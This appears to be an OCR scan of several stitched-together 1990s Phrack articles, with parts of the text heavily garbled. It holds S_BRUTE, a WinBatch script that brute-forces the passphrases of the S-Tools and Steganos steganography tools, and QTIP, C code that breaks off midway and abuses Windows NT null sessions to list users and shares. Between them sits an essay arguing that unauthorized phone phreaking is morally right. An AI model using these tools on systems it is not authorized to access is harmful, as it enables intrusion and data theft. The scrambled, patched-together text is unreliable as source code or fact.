container when creating your message. In simplest terms, mold your message 
around the existing container instead of molding the container to your message. 
If, for example the original image were left unchanged, and a key was 
developed to create the message _from_ the image, detection would be impossible 
without the key. 


Several advances are being made in the area of random distribution, 
specifically by Tuomas Aura at the Helsinki University of Technology. His 
paper "Practical Invisibility in Digital Communication" presents a technique 
called "pseudorandom permutation", which brings steganography up to the 
technical level of cryptography and properly addresses the issue of 
randomness from a data hiding perspective. His paper is excellent reading 
and can be found at http://deadlock.hut.fi/ste/ste_html.html 


Interesting research (and proof-of-concepts) are being done to utilize 
stego techniques in reserved fields in TCP, UDP and ICMP packets. This 
research proves that steganography has merit and application beyond sound and 


image files. Unfortunately, using stego where there was nothing before (ie 
within typically blank reserved fields) can raise a flag in and of itself. Use 
encryption and compression to further protect data. It really doesn’t matter 


if the secret data is discovered if the underlying crypto is secure. 


VI. Conclusion 


Detecting stego in an 8-bit image is fairly easy. Actually gaining access 
to the secret text becomes a bit harder yet a simple overlooked method involves 
bruteforcing the creating application (see S_BRUTE.WBT program below). On the 
other hand, 24-bit image analysis requires quite a bit of work. If you choose 
to employ data hiding techniques, use 24-bit images and compress and encrypt 
your message file, bearing in mind that 24-bit images can raise flags simply 
due to their size. 


When attempting to identify stego files in 8-bit images, keep in mind the 
following pointers: 


Search for the obvious thumbprint of an RGB element. 
In the stego file: single-bit offsets between colors in a palette sorted by 
luminance (this SCREAMS S-Tools!). 
* If no single-bit offsets exist between the colors in the palette, search 
for Palette Reference thumbprints which include the following: 
* Use of palette index neighbors a near-equal number of times either in the 
ntire image (use a histogram) or in an area which should be primarily 
Single-color only but contains a checkerboard effect (use zoom 11:1 to see 
individual pixels, and the eyedropper tool to quickly view the RGB 
elements in PSP) 
Poor image quality (noise and snow are common side-effects). 
For more detailed analysis the reader might consider using an MS-DOS 
program msgifscn.zip, available from Simtel mirror sites worldwide, to 
dump th ntire contents of an 8-bit GIF image’s palette to a file, which 
can be dumped into MS Excel for analysis (the analysis add-in in for Excel 
comes in REAL handy for binary conversions and data sorts.) 
* If you have a clue that the file you’re looking at may contain stegoed 
data, it never hurts to brute force the application that created it! (see 
the S_BRUTE program listing at the end of this article) While this may be 
one of the slower methods of breaking stego, it is often easier to 
derive possible keyphrases from other sources than attacking the stego 
algorithm or the crypto. 


VII. The program 


The author of S-Tools sells the source code for his program, and Steganos 
makes available an SDK for hiding/decoding files using it’s algorithms, but 
an option exists for programs that do not make their source available: 
bruteforce of the application itself. Although using the API and SDK’s 
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available would be significantly faster, there are times when this option 
just may not exist. 

To that end, included below are two files, S_BRUTE.WBT and S_BRUTE.INI. 


http://www.windowware.com for the free compiler to run S_BRUTE). 
ll bruteforce S-Tools v4 and Steganos using a 
le in an attempt to determine the passphrase of 
ly reveal the hidden text). 
le you select, 
ly bruteforce the passphrase, 
le to S- Tools. 
so you wil 


an application that wil 
dictionary fil 
(which will subsequent] 
tool to use based on which executab] 
the program will not onl 
four algorithms availabl 
mouse-only operations, 
S-Tools portion runs. 
of words or passphrases separated by new] 
does not allow passwords shorter than five characters, 
If you need to use a 
(two double quotes) 
log file is created as c:\output.txt which simply lists all 
The output file can be reused as a dictionary since no 
Two options exist for inputting the 
the dictionary file and the stego image. 
allows the variables exepath, dict 
ow the input of these full path names into the 

the program can prompt for the filenames manually 

‘95 file boxes. 
titles describ 


save time. 
simply use 


words/passphrases. 
extraneous information is written out. 
he Stego tool executable, 
E.INI file format ( 
and stegofile which all 
program. 

using sta 


names of t 
The S_BRUTI 


like the UNIX 
context. 
perfect vehicl 


wee 


In addition, 
ndard Windows 


This program was written in WinBatch, 
language TCL/TK 
Developed to control Windows appl 
for brute-forcing an application’s password function 


(or Expect), 


lications, 


which is a language that acts very much 


but operates in a Windows 95/NT 
WinBatch provides a 
(see 
S_BRUTE 


= 


is 


a stegoed image 


box titles as they come up. 


looking for. 
ST] 
for a passphrase error message from Steganos. 


EGANOSDELAY. This val 


ue 


lines. 


The program selects which 
and the S-Tools portion of 
but will attempt all 


Unfortunately S-Tools uses certain 
ll effectively lose your mouse while the 
[The dictionary needed by this program is simply a list 


W 


(double- 
in the dictionary. 


Keep in mind that Steganos 
so strip those out 
in the word/passphrase, 
WinBatch likes this. 
the attempted 


to 
quote) 
A 


see below) 


In 


this case, pay attention to the 


Thes 


A variable is also available 
(listed in seconds) 


get a lot of false positives 


seconds. 
always accurate as to 
this case, 
have to try the word S_ 
in c:\output.txt 
Either way, 


rg 


whic 


n. 


(your machine 


Due to the speed of the bruteforce attack, 
actually worked if it finds a match. 


word 


will 


S_BRUTE 


tell 


lus 
on 


(p 
you are 


Note that S-Tools 


BRUTE 
a few different al 
ly looking at about 12 combinations 


what file the program is 
in the INI file called 

determines how long to wait 
The default is 0, but if you 
is SLOW!) set this value to a few 
this program is not 


In 


you which word it _thinks_ worked, but you may 


gave you plus 


and/or Steganos must be properly installed 


one or two of the previous words 


lgorithms if you’re using S-Tools). 


(not bad!). 


prior to using 


this program. S_BRUTE was not designed to brute force th ntire keyspace, but 
to give you a faster method of determining the passphrase if you have any idea 
what it might be. If the stego image is found on a web page, create a 
dictionary from words and phrases found on that site, and let S_BRUTE do the 
work for you. 
<++> sbrute/S_BRUTE.WBT 

; Steganography Brute v1.0 written by a researcher at hacklab.com 

; For new versions and support programs see http://www.hacklab.com 

; This little toy brute forces two very common Steganography utilities, 

; specifically Steganos (http://www.steganography.com) and S-Tools written 

; by Andrew Brown (a.brown@nexor.co.uk) 

; This program can be run using a free program called WinBatch 

; from http://www.windowware.com 

’ 

7 

;Notes: 

’ 

; 1) The program depends on the executable name being either "S-TOOLS.EXE" or 

; "STEGANOS.EXE". This exe name decides many things, including the 

; semantics of the brute force attack and which types of container files 

; to accept. (Remember that the tools accept different types of container 

; files.) 

; 2) The dictionary file is simply a text file with words or phrases separated 

; by CR(LF). If a " (double quote) must be used in the word or phrase, 

7 use "" (two double quotes) instead. This is Winbatch’s way of representing 
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Pur the double quote in a string. 

+; 3) Internally, this program converts all Windows LFN-formatted dir/filenames to 
aH DOS-style 8.3 or short dir/filenames. If you have problems, finding/using 

a LFN files, you may want to manually convert them to a SFN dir/file structure. 
;; 4) The S-Tools test requires certain mouse-only operations. During this part of 
4 the program, it’s best to leave your machine alone. Otherwise the mouse will 
rip be all over the place. Sorry. 

TOTTI EET TTT TTT EET 

:main a 

TOTTI TTTTT TET TTT TTT EET TTT 

Intcontrol (12,4,0,0,0) ;;controls abrupt endings 


if (winmetrics(-4) < 4 ) 
error="This program runs on Windows NT or Windows ’95 only!" 
gosub bail_error 


Endif 


cer=Num2Char (13) 

1£=Num2Char (10) 

crlf=StrCat(cr, 1f) 

progname="Steganography Brute" 

STEGANOS=0 7; Flag for Steganos 
STOOLS=0 ;; Flag for S-Tools 


textl=’This program brute forces Steganography programs.’ 

text2='’Including S-Tools v4.0 and Steganos. Do you wish’ 

text3=’to continue?’ 

iq = AskYesNo(’ Sprogname%’,"Stext1% Scrlf%S Stext2% Scrlf% Stext3%") 

If (AskYesNo(’ S%prognameS’,"%Stext1%S Scrlf%S Stext2% Scrlf% Stext3%") == @NO) Then Exit 


textl="It is easiest to make all file settings through the" 

text2="S BRUTE.INI file in this directory. If you do not use" 

text3="this file, you will be manually prompted for the files." 

Text4="Do you wish to use the INI file?" 

q= AskYesNo("Sprogname%"," Stext1% Scrlf%S Stext2% Scrlf% Stext3% Scrlf% Stext4%s") 


if (q == @NO) Then gosub prompt_for_files 
else gosub set_files 


if (STEGANOS) 
gosub steganos 


else 
if (STOOLS) then gosub stools 
EndIf 


error="Passphrase not found!" 
gosub bail_error 


Exit 


COE BE POE Ee EE EE EL BE FEE FS ELE ET BPE 
:steganos Pear 


OS Fo SR Ee Fe ee Oe Fe eee Foe 


Run ("SexepathS", "SstegofileS") 


WinWaitExist("",10) 77; Steganos’ first window has no title. 
77; If you have problems, 

SendKeysTo("","{ENTER}") ;77 comment out these two lines... 

; TimeDelay (10) 777 and uncomment... 


; SendKey ("{ENTER}") ;;7 these two lines. 
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WinWaitExist ("Steganos for Windows 95", 30) 
SendKeysTo("Steganos for Windows 95","{ENTER}") 


dictgrip=FileOpen ("$dict%", "READ") 
fnl="c:\output.txt" 
handleout=FileOpen ("Sfn1%", "Append") 
stitle="Steganos for Windows 95" 
START_TIME=TimeYmdHms () 


word=0 

while (word != "*EOF*") 
word = FileRead(dictgrip) 
if word ==""_then continue 
if word =="*EOF*" then break 


ClipPut ("Swords") 
SendKeysTo(stitle, "*v{ENTER}") 
TimeDelay (STEGANOSDELAY) 
test=strsub (MsgTextGet (stitle),1,22) 
if test=="" 
textl="I think we have a match!" 

text2="Due to the speed of the brute force attack, check c:\output.txt" 
text3="to s the last few words used, but I think the passphrase is:" 
text 4="Swords" 

success="Stext1% ScrlfSStext2% ScrlfSStext3% ScrlfSStext4s" 

gosub bail_success 


else 

if test=="This password is wrong" 
SendKeysTo(stitle, "{ENTER}") 
SendKeysTo(stitle,"!B{ENTER}") 
FileWrite (handleout,"Sword%" ) 

endif 

endif 

endwhile 


STOP_TIME=TimeYmdHms () 


FileClose (dictgrip) 
FileClose (handleout) 


SPIELE EE CEE REE EAA LEE EEL EL TA EE 
:stools ea: 


SEE EEE EE EOE BEL EE FOE EE FEE EE EE EEE 

Run ("Sexepaths", "Sstegofiles") 

if (WinWaitExist ("Welcome to S-Tools",5) == @TRU 
SendKeysTo("Welcome to S-Tools","!C") 


GJ 
~~ 


Endlf 


winplace(0,0,400,400,""~S-Tools") 
WinWaitClose("Please Wait") 
SendMenusTo("~S-Tools", "Window Tile Horizontally") 


textl="S-Tools requires certain mouse-only operations." 
text2=’After clicking OK, position the mouse within your’ 
text3="image in the S-Tools window and click the left button." 


message ("Setup mouse for S-Tools","Stext1% Scrlf% Stext2% Scrlf%S Stext3%") 


while (mouseinfo (4) !="4") 
magic=mouseinfo (2) 
endwhile 


magicx=( ItemExtract(1l,magic," ") ) 
magicy=( ItemExtract (2,magic," ") ) 


dictgrip=FileOpen ("Sdict%", "READ") 
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fnl="c:\output.txt" 
handleout=FileOpen ("Sfn1%", "Append") 


START_TIME=TimeYmdHms () 


word=0 
while (word != "*EOF*") 
word = FileRead(dictgrip) 
if word =="" then continue 
ClipPut ("Sword%") 
777 write to the output file 
if word!="*EKOF*" 
if (FileWrite (handleout, "Swords" ) >0) 
error="Unable to open file %fn1%." 
gosub bail_error 
Endif 
Endif 
for dumnum=1 to 4 7; for all the algorithms 
MouseMove (magicx, magicy, "","") 
MouseClick(@RCLICK, 0) 
SendKeysTo(""S-Tools", "r") 
SendKeysTo(""“Revealing", "!P%v!V%v!E") 
if (dumnum==1) then SendKeysTo(""Revealing","I") ;; IDEA 
if (dumnum==2) then SendKeysTo(""Revealing","D") 7; DES 
if (dumnum==3) then SendKeysTo(""Revealing","T") =; DES3 
if (dumnum==4) then SendKeysTo(""Revealing","M") 7; MDC 
SendKeysTo(""Revealing", "{ENTER}") 
;childlist=WinItemChild("~S-Tools") 
numchilds= ItemCount (WinItemChild("~S-Tools"), @TAB) 
if (numchilds>2) 
textl="We have an extra window in S-Tools! Possible passphrase match." 
text2="Due to the speed of the brute force attack, check c:\output.txt" 
text3="to s the last few words used, but I think the passphrase is:" 
text 4="Swords" 
success="Stext1% ScrlfSStext2% ScrlfSStext3% ScrlfSStext4s" 
gosub bail_success 
endif 
next 
endwhile 


FileClose (dictgrip) 


FileClose (handleout) 


return 


CRS PE IEE LE EE EE Ee Ee Ee a RE. 


:set_files a 


fF In EPPO EES FES EE EE SOS EF EF EE OF FE BOSE FT 


fname=IniReadPvt ("Main", "exepath", ".\S-TOOLS.E 


7 
x 


E", ".\S_BRUTE.INI") 


5 


gosub path_clean 


xepath=fnam 


gosub determine_tool_type 


fname=IniReadPvt ("Main", "dict", ".\DICT.TXT", ".\S_BRUTE.INI") 
gosub path_clean 
dict=fname 


7] 


fname=IniReadPvt ("Main", "stegofile", ".\STEGO.GIF", ".\S_BRUTE.INI") 
gosub path_clean 


stegofile=fnam 
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STEGANOSDELAY=IniReadPvt ("Main", "STEGANOSDELAY","0",".\S_BRUTE.INI") 


gifname= ItemExtract( (ItemCount ("Sstegofile%", "\")), "%Sstegofiles", "\") 


Return 

(7 al Al 2 2 
:prompt_for_files eas 

(7a al Ad A 2 2 0 

msg = "Enter the Steganos error delay 0-60" 


STEGANOSDELAY=AskLine("%Sprogname%", msg ,"0") 


types="Dictionary Text Files|*.txt|All Files|*.*|" 
dict=AskFileName ("Select Dictionary Filename", "C:\", types, 
dict=FileNameShort (dict) 


types="Steganography tool Executable|*.exe|" 
msg="Where is the S-Tools or Steganos executable?" 
exepath=AskFileName (msg, "C:\", types, "", 1) 


xepath=FileNameShort (exepath) 


gosub determine_tool_type 


if (STEGANOS) 
types="Stego File (with hidden message) |*.bmp;*.dib;*.voc;*.wav;*.txt;*.html|" 


else 


types="Stego File (with hidden message) |*.gif;*.bmp;*.wav|" 


endif 


textl="Select Stego Filename (containing hidden message)" 


"Gict..jtke", 1) 


stegofile=AskFileName ("Stext1%", "C:\", types, "", 1) 
stegofile=FileNameShort (stegofile) 

gifname= ItemExtract( (ItemCount ("Sstegofiles", "\")), "Sstegofiles", "\") 
Return 

(7 al Al A 2 0 

:path_clean ii 


OE 2-2 EEE ENE BEE SPE EEE ed EE PE SAE Eo PE FE 


switch FileExist (fname) 


case 0 
error="File %fname% not found!" 
gosub bail_error 
break 
case (2) 
error="File %fname% in use!" 
gosub bail_error 
break 
endswitch 
fname=FileNameShort (fname) 
Return 
(7 A 0d 0 0 2 0 0 2 
:determine_tool_type Re 


PEI ES TE EE EEE EE EE OE EE EE PF 


exename=(StrUpper (ItemExtract ( (ItemCount ("Sexepath%s", "\")), 


if (exename == "S-TOOLS.EXE") then STOOLS=1 


lse if 


Return 


xename == "STEGANOS.EXE") then STEGANOS=1 


"Sexepaths", 


m\m) )) 
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CF EOE RP Le a EE EE Pe EE PE PE ee EER SE 
:bail_error Bre 


CS RE Ea OE ee A OT POR, OF 


STOP_TIME=TimeYmdHms () 


Message ("Sprogname%S Error!","Serror%S") 
SECONDS=TimeDiffSecs (STOP_TIME, START_TIME) 

Message ("Sprogname%S","Finished in SSECONDS% seconds.") 
Exit 

TOTTI TTTTT TEE TT 

:bail_success i 


2 POT PE ee EOP RE ee Ee Ee EER Pe Ee 


STOP_TIME=TimeYmdHms () 


Message ("Sprogname%S Success!!!","%Ssuccess%") 

Message ("Sprogname%S","Time Started: SSTART_TIMES%crlf%STime Finished: 
Exit 

<--> 

<++> sbrute/S_BRUTE.INI 

[Main] 

EXEPATH="C:\Program Files\Deus Ex Machina\Steganos\Steganos.exe" 


DICT="C:\win\desktop\dict.txt" 

STEGOFILE="C: \win\desktop\steclouds.bmp" 

; STEGOFTILE="C: \win\desktop\s-tclouds.gif" 

STEGANOSDELAY=0 ;; Set this higher for false positives. 

7; (Steganos does not use different names f 
7; Windows, so this program makes negativ 


or its 
result 


;; checks (ie bad passwords) based on an er 
;; This timeout controls how many seconds t 
7; an error. Default=0 


ror dialog. 
o wait for 


SSTOP_TIM 


9.txt Wed Apr 26 09:43:42 2017 1 
---[ Phrack Magazine Volume 8, Issue 52 January 26, 1998, article 09 of 


[ On the Morality of Phreaking 


at [ Phrack Staff 


The issue of phone phreaking is an interesting topic for 
discussion concerning morality. For those not familiar with this 
topic, I will give a brief outline of the subject. Following the 
outline of phreaking, I will analyze the issue of whether 
phreaking as defined in the outline is a morally right act, from 
the perspective of John Stuart Mill and Immanuel Kant. Finally, 
I will address the fallacies of each of the arguments they might 
present concerning the topic and provide a determination of which 
stands as the superior argument for this subject. 


The meaning of phone phreaking has changed over the years; 
its initial growth can be traced in a large part to a magazine 
named TAP (Technical Assistance Program) started by Abbie Hoffman 
in 1971 as part of his Youth International Party (YIPL) (Meinel, 
5). The intent at this point in time was to utilize technology 
in order to subvert government and big business institutions. As 
time progressed, phreaking became less politically motivated and 
instead was led more by technology enthusiasts interested in 
learning about the phone systems and how they worked. In 1984, 
2600 magazine was formed by Eric Corley in order to further this 
spread of knowledge (Corley). 


The definition of phone phreaking I will use for the 
purposes of this paper is that which the prominent members of the 
hacking/phreaking "scene" would use. In discussing the 
motivations of a phone phreaker, I speak from both personal 
experience and from numerous conversations with individual 
hreakers over a period of years. Phreaking is the pursuit of 
nowledge concerning how phone systems operate. The skills that 
phreaker learns in this pursuit of knowledge has the effect 
hat they can often gain control of a phone switch in order to 
ake add additional phone lines, modify billing information, and 
ther such activities, but these are generally considered 
nrelated to that which an actual phreaker is interested in, and 
will focus only on the activities of those true phreakers that 
are motivated by the desire for knowledge and not for other 
gains. Generally however, phreaking does involve utilizing the 
resources of a phone company switch without the permission of the 
company owning it, in order to both explore its capabilities and 
to communicate with other phreakers in order to share knowledge. 


HoEOB cto WD 


John Mill, given his views of morality as found in 
Utilitarianism, would find that phone phreaking is a morally 
right act. In order to find that an act is morally right, it 
should have a net benefit in terms of the happiness it adds to 
the world versus the opposite of happiness it causes (Mill, 7). 
To show that phreaking is morally right, first it must be shown 
that it does have a positive effect on the general happiness in 
the world, and then proceed to show that any negative effects 
that phreaking may have are sufficiently minor so as to be 
outweighed by the positive effects. If the positive effects are 
greater than the negativ ffects, then clearly the act is 
morally right. 


First, the actual benefit that phreaking has for the 
individuals involved in it is not directly the pursuit of 
happiness, but rather the pursuit of knowledge. Since morality 
is determined by happiness, not knowledge, how knowledge relates 
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to happiness needs to be resolved. The reason this pursuit still 
relates to morality is that individuals that are pursuing 
knowledge for no motivation other than itself are doing so 
because the gain of knowledge has become a part of those 
individuals’ happiness. It is in the same way that Mill argues 
the pursuit of virtue can be reconciled with the pursuit of 
happiness that knowledge can also be reconciled (Mill, 35-37). 


Phreaking does have a benefit to the individuals that are 
involved in its practice. This benefit is in the form of a gain 
of knowledge concerning the phone systems. This knowledge is 
gained in generally one of two ways, both of which are common 
methods of learning and the reader will recognize. The first is 
through experimentation and exploration. By accessing the phone 
switch, phreakers are able to experiment with its capabilities 
and teach themselves how to operate it. In the second case, the 
phone switches that phreakers have learned to use are utilized as 
a method of communication with other phreakers. The free 
communication that comes about as a result of the phone system 
knowledge that has been gained allows phreakers to exchange new 
1 
t 
b 
p 
ll: 


nformation and teach each other, either as peers or through a 
eacher-pupil relationship, even more about the phone system. In 
oth cases, knowledge is gained, and as knowledge is a part of a 
hreaker’s happiness, the general happiness of the world is 
ncreased. 


Any negative impact phreaking has is minimal, and indirect. 
The resources that are being used are possessed by phone 
companies, corporations. A corporation of itself is not a moral 
being, but a corporation has an effect on three different types 
of people: stock holders, employees, and consumers. 


A stock holder’s interest in a corporation is purely on the 
profits that it produces. Stockholders could be negatively 
effected by phreakers if a phreaker causes a loss of revenue, or 
an increase in costs. A loss in revenue for a phone company can 
only occur if the phreaker uses some resource that if not in use 
would otherwise be used by a paying customer, or if the phreaker 
herself would have paid for the resource utilization if it had 


not been attainable for free. In the first case, phone systems 
use a technique called multiplexing to handle simultaneous phone 
calls between switches. If a phone system is below capacity, 


there are empty time slices or frequencies (depending on type of 
trunk) in the data that is transmitted between switches. Adding 
a new connection between switches involves only filling one of 
these idle slots, with no degradation of quality for existing 
phone calls, and no marginal cost associated with the additional 
call. It is only in the case where a phone system is filled to 
capacity that a phreaker using a slot would prevent an existing 
customer from using the phone system, resulting in a loss of 
revenue. In fact, phreakers being more cognizant of this fact 
that the general public will purposely explore the phone system 
when it is at its lowest capacity times (late at night and on 
weekends) just to avoid this situation. 


The second part of the stock holders interests is that a 
hreaker would potentially pay for the phone calls she is making 
or free. An attraction of phreaking is that it does not cost 
oney to involve ones self in, and most phreakers first start in 
heir youth when they do not have access to being able to pay for 
hone calls to other phreakers, or even more to the point there 
Ss no price they could pay to gain access to a switch. If the 
hone company were to make this available at a price to 
hreakers, almost universally they would not be able to afford 
he price, and would have to stop their gains in knowledge in 
hat subject. This would not result in any additional revenue 
for the phone company, only a loss of knowledge that the phreaker 
could have otherwise gained. 


t+ t'0 Oo BO t 3 HO 
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Employees are only impacted if they are either aware of 
something occurring, or have to perform some activity as a result 
of a phreaker’s activities. However, a phreaker only interacts 
with the phone company’s equipment in an under utilized state, 
and not with employees. Further, phreakers do not cause damage 
or interfere with the operation of the phone company’s equipment, 
and so require no employ intervention. In this manner, no 
mployees are affected by phreakers. 


Finally, consumers are also not negatively impacted by 
phreakers. A phreaker’s interactions with switches does not 
cause any disruptions in service or prevent consumers from using 
the same switches simultaneously. Further, there is no 
interaction that takes place with consumers as a result of a 
phreaker’s activities, and so they are never impacted in any 
manner. 


It is possible there can be a negative impact as a result of 
the perception of phreakers and based on people with different 
moral viewpoints than the utilitarian view. Some people are 
scared by a phreaker’s knowledge, and some people are intent on 
protecting their resources even from those with moral pursuits. 
These people may become agitated as a result of a phreaker’s 
activities, and although they have no utilitarian reason to be, 
their agitation should still be considered. However, weighing 
the moral righteousness of the knowledge being gained, an 
agitation seems to be greatly outweighed. Based on these 
criteria, it is clear from the utilitarian viewpoint phreaking is 
overall beneficial and is morally right. 


In contrast to the views of Mill, Immanuel Kant would not 
find phreaking to be a moral act. In order to find an act moral 
from a Kantian perspective, it must be in accord with duty (Kant, 
9), universalized (Kant, 14), and then tested for a contradiction 
in thought (Kant, 32) or a contradiction in will (Kant, 32). If 
an action does not succeed in passing these tests, it can not be 
a moral act. 


The goal of phreaking, the pursuit of knowledge, is in 
accordance with duty. An individual has an inclination towards 
improving himself, gaining knowledge being one way of doing so, 
so this would be an imperfect duty to self (Kant, 31). 


There are several possible manners in which the act of 
phreaking could be universalized. One could say "all people 
should use the phone system without paying in order to pursue 
knowledge." This is not a contradiction in thought, a phone 
system that allowed anyone pursuing knowledge to use it free of 
charge could exist and persist. However, there would be two 
major results of having this sort of system. First, the loss in 
revenue from large numbers of people no longer paying would 
result in those communicating when not pursuing knowledge 
subsidizing those that were. Second, a fr phone system would 
have an enormous increase in usage, causing it to reach its 
capacity quickly and preventing it from being available to those 
who needed to use it. Nobody wants to have to spend hours 
attempting to make a phone call in order to get through, and so a 
system of this type is a contradiction in will for most people, 
and would thus not be moral. 


A preferred universalization of phreaking would be "all 
people interested in gaining knowledge should be able to freely 
use unutilized corporate resources in order to do so." The goal 
of a corporation is to maximize profits. If a corporation has 
under utilized resources with a value, it is in the company’s 
interest to produce additional revenue based on those resources. 
If a company does not have under utilized resources, it does not 
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apply to this universalization. The final case is if a company 
has under utilized resources, but the resources have no value. 

If they have no value, of what use would the resource be to a 
person interested in gaining knowledge (i.e. if it was useful to 
someone, it would have value). So it is a contradiction of 
thought for a company to have an under utilized resource of value 
for an extended period of time; if those seeking knowledge are 
able to recognize an under utilized resource with value, then the 
company would quickly realize that resource does have value, and 
utilize its value for profit or else sell the resource off. 


Because there is no manner in which phreaking can be 
universalized so as to preserve its intent and not provide a 
contradiction of thought or will, it can not be a moral act in 
accordance with the views of Kant. 


In analyzing which of Mill or Kant has a more solid 
argument, it becomes clear that neither philosophy is ideal for 
all situations. Both the utilitarian and Kantian viewpoints have 


disadvantages that are addressed below, however as a whole the 
Mill utilitarian view of phreaking provides a more rational view 
that is applicable to those who are phreakers. 


First, the utilitarian viewpoints of Mill only considers the 
individual act in the context of the current state of the world 
in deciding if it is moral That is, a single act may in all 
cases contribute to the general happiness of the world, but it 
may also leave the world changed in some other respect that does 
not add to or take away from the general happiness. However, the 
change that has taken place may very will have an impact on how 
that same act or a completely unrelated act would impact the 
world so as to make what was once moral now immoral. Although 
the potential for alternative moral acts remain in that world, 
and so you have not reduced its potential for happiness, what it 
has done is impacted the available choices of others in how they 
can go about acting in a moral manner. This is not a concern of 
Mill, but of those interested in freedom, as an end to itself, 
actions promoting the general happiness may adversely affect the 
freedom of others to act in a moral manner. 


The view Kant gives of morality provides that if an act can 
not be universally applied, it can not be morally right. In the 
case of phreaking, is it possible that it is at some point for 
some people a morally right act to phreak, but not for all people 
at all times? The basis for this argument is that there are some 
people who are both honestly extremely interested in the phone 
systems and do not have the resources to explore their interest 
in any reasonable fashion for some period of time. The typical 
case is with a phreaker is a young adolescent that has become 
intrigued with phones. I would contend that for one that is 
truly interested in learning and has no alternative means, that 
it is morally right for that person to phreak. 


However, as that person grows older and gains access to 
resources, alternative means become available for him to continue 
to learn about the phone systems (money buys resources, a job at 
the phone company provides an immense opportunity to learn). At 
the point where alternative means are available, it is no longer 
moral for that person to phreak. Where exactly that point occurs 
is a blurred line, but it is certainly not a universal law as 
Kant would imply. 


In summary, the subject of phreaking is certainly a 
controversial subject and would be viewed by many as an out of 
hand immoral activity. But, at closer examination it is actually 
something that is done for very moral reasons and although the 
morality of a phreaker may not necessarily correspond to the 
morality of all others in society, it is certainly in the mind of 
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the true phreaker a moral activity in which they are engaging, 
with intelligent rational premises backing up their moral views. 
Although Kant may not agree with the moral views that are held by 
the phreaker, the individual circumstances confronted by the 
individual are not considered and if morality can be decided on 
an individual basis, as Mill allows, then it may just be that the 
Kantian view may be too restricting to account for contemporary 
issues faced in today’s technological society. 
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[ a Quick nT Interrogation Probe (QTIP) 


aRae SSS [ twitch <twitch@aye.net> 


----[ INTRODUCTION 


As you probably already know, certain LanMan derivatives (most notably 
Windows NT) sport a stupid feature known as ‘null sessions‘. Null sessions 
allow server connections to be established without the hassle and rigmarole of 
username or password authentication. This is reportedly to ease 
administrative tasks (UserManager and ilk utilize them). Also, such silliness 
such as the RedButton bug have shown (although in poor form) that an 
interested/malicious third party can gleen quite a bit of info from ‘Press any 
key to return to index*. Once established, these connections default to having 
permissions to display enumerated user and share lists, get information about 
particular users, wander the registry, etc. QTIP takes advantage of this, 
allowing the user to procure far too much information about the target 
machine. It employs no black magic or hidden technique to do this. OQTIP 
works via straight API calls. 


As of service pack 3 for NT 4.0, it is possible for the ‘informed* system 
administrator to block null sessions through the registry, effectively 
nullifying any threat from QTIP. I do not, however, believe that there is 
such a patch for 3.5.1 machines. Also, it has not been tested against SAMBA 
servers, and as far as the author knows, SAMBA does not support something as 
asinine as null sessions (anyone who knows any differently is invited to mail 
corrections to the author, or directly to Phrack Magazine). 


To prevent these sorts of shenanigans from happening remotely across the 
Internet, the concerned system administrator can block NBT traffic at the 
gateway (this sort of traffic should not be allowed to/from the Internet as 
standard fare). If you are running NT 4.0, install the service packs, and set 
the appropriate registry values to disable the attack. Or use OpenBSD. 


----[ THE CODE 


QTIP has a few options. qtip -h supplies the following info: 


usage qtip[asug<username>hv] <target> 
=S' get share list 
ss get user list 
g <username>: get infos about <username> 
dis leave connection established on exit 
-a: -s + -u 
hy, <2 display this help 
=Ve be verbose (use twice to be garrulous) 


Seems rather self explanatory. If the verbose flag is set, then -u 
implies a recursive -g. -d is handy if you plan to take a look at the 
registry as well (there’s gold in them thar hills). Omission of all flags just 
establishes a null session and exits. <target> can be a fully-qualified 
domain name, ip address, or UNC format. The code compiles like a dream under 
visual c 4.1. There is no makefile included, just link the code against 
kernel32.1lib, libc.lib and wsock32.lib. This program is most useful wrapped 
in scripts with something like tping(ip sweeper), and maybe a few registry 
inquisition perl scripts. Feel fr to redistribute, just give props where 
props are due, and please let me know if you make any interesting changes. 


<++> qtip/qtip.h 
/* 


[o) 
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qtip.h 
12/04/1997 
twitch 
twitch@aye.net 


a quick nt investigative probe. (mis)uses null sessions to collect 
sundry information about a WindowsNT server. distribute as you 
please. be alert, look alive, and act like you kow. 


, 


-i should dismiss him, in order to teach him that pleasure consists 
not in what i enjoy, but in having my own way.’ 
-sk, either/or 


+ + + + + + FF F F F F F FX 


include <stdio.h> 
include <windows.h> 
include <winsock.h> 
include "lm.h" 


define k16 16384 
define TARG_LEN 255 
define USER_LEN 22 


void handle_error(DWORD) ; 
void prepend_str(char *, char*); 
nt open_session(); 

nt procure_userlist(); 

nt procure_sharelist(); 
parse_cl(int, char **); 
usage(char *); 

nt powerup(int, char **); 
oid bail(const char *); 

nt close_session(); 

void get_usr_info(wchar_t *); 


oume) 
Be Bs 
jormer 


BQGkagkeR 


/* couple o globals to make my life easier */ 


u_int OPT_SHARES, OPT_USERS, OPT_GETUI; 
u_int OPT_NODEL, VERB; 

char target [TARG_LEN]; 

WCHAR utarg[TARG_LEN]; 

WCHAR user [USER_LEN]; 

NETRESOURCE nr; 

<--> 

<t++> qtip/qtip.c 


/* 
F-Gtli pic 

* 10/04/1997 

* twitch 

* twitch@aye.net 

* 

* a quick nt investigative probe 

* link against kernel32.1lib, libc.lib and wsock32.1lib. 
* qtip -h for usage. distribute as you please. 

* 

*/ 


#include "qtip.h" 


int main(int argc, char *argv[]) 
{ 
if( (powerup(argc, argv)) ) 
return(1); 


if( (open_session()) != 0) 
return(1); 
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} 


if (OPT_SHARES) 
procure_sharelist(); 


if (OPT_USERS) 


procure_userlist(); 


if (OPT_GETUL) 
get_usr_info(utarg) ; 


close_session(); 
return (0); 


int open_session() 


{ 


*/ 


{ 


DWORD vj 
nr.dwType = RESOURCETYPE_ANY; 
nr.lpLocalName = NULL; 
nr.lpProvider = NULL; 
nr.lpRemoteName = target; 

if (VERB) 


printf ("establishing null session with $s 


r = WNetAddConnection2(&nr, "", "", 0); 
if(r != NO_ERROR) { 

handle_error(r); 

return -1; 


} 


if (VERB) 
printf ("connection established\n"); 


return 0; 


procure_userlist () 


eee\n", target); 


just use the old Im NetUserEnum() because there isnt comparable 


NULL; 
entread, totent, 


rhand; 


maxlen = Oxffffffff; 


, utarg); 


é&éentread, &totent, 


&rhand) ; 


functionality in the WNet sect. i just wish the win32 api was 
more bloated and obtuse. 
int procure_userlist () 
NET_API_STATUS nas; 
LPBYTE *buf = 
DWORD 
DWORD 
USER_INFO_0O *usrs; 
unsigned int i; 
int cc = 0; 
ntread = totent = rhand = nas = 0; 
if( (buf = (LPBYTE*)malloc(k16)) == NULL) 
bail ("malloc probs\n"); 
iff (VERB) 
